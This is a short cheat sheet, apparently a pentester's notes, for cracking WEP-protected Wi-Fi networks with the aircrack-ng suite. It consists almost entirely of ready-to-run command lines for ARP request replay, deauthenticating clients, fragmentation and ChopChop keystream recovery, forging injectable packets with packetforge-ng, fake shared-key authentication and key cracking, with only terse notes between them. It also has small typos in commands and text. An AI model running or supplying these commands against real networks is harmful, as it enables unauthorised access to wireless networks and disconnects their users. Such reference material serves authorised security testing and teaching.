Crack WEP with a client and open system authentication

ARP request/replay attack

aireplay-ng -3 -b <ap_mac> -h <chipset_mac> <wlan1mon>

Deauthenticate a supplicant can generate an ARP packet

Cracking WEP

aircrack-ng -z <out.cap>

Crack WEP via a client

Packet replay

ToDS set to 1

aireplay-ng -2 -b <ap_mac> -d FF:FF:FF:FF:FF:FF -t 1 <wlan1mon0>

Looking for ARP packets sent by the AP

aireplay-ng -2 -b <ap_mac> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 <wlan1mon0>
Modified packet replay

Thanks to the Frame Control Field, the packet seems to come from a client

aireplay-ng -2 -b <ap_mac> -d FF:FF:FF:FF:FF:FF -t 1 -p 0841 <wlan1mon0>

Crack WEP clientless and open system authentication

1. Generate PRGA XOR

Fragmentation attack

aireplay-ng -5 -b <ap_mac> -h <chipset_mac> <wlan1mon>

ChopChop attack

aireplay-ng -4 -b <ap_mac> -h <chipset_mac> <wlan1mon>
2. Forge an injectable packet

Try to guess a valid source IP and an unsued destination IP/br> You can use the broadcast address for source and destination

packetforge-ng -0 -a <ap_mac> -h <chipset_mac> -l <source_ip> -k <dest_ip> -y <prga.xor> -w <inject.cap>
3. Inject forged packet and crack
aireplay-ng -2 -r <inject.cap> <wlan1mon>
aicrack-ng <airodump.cap>

Crack WEP with client and SKA

Option 1 - Standard attack

1.You must listen on the right channel filtering with the BSSID
2.Association should not work and airodump AUTH should say SKA
3.Deauthenticate a supplicant should generate a keystream (PRGA XOR)

Once the PRGA XOR is generated, use it to run a fake authentication

aireplay-ng -1 6000 -e <essid> -y <prga_xor> -a <ap_mac> -h <chipset_mac> <wlan1mon>

Once authenticated, it is a basic WEP crack (ARP request/reply)

Option 2 - Broken SKA

If the standard attack did not work, listen for ARP packets with the MAC of the supplicant you are going to deauthenticate
You will still generate a broken SKA, but the ARP replay attack should work anyway.

aireplay-ng -3 -b <ap_mac> -h <supplicant_mac> <wlan1mon>